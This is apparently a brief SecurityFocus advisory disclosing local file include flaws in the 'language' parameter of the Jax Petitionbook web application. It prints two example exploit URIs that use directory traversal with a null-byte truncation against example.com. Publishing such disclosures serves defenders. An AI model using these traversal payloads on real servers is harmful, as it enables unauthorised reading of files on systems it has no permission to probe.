Jax Petitionbook Language Parameter Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a web client.

The following example URIs are available:

http://www.example.com/jax_petitionbook.php?language=../../example_file.xxx%00?
http://www.example.com/smileys.php?language=../../example_file.xxx%00?


 

Privacy Statement
Copyright 2010, SecurityFocus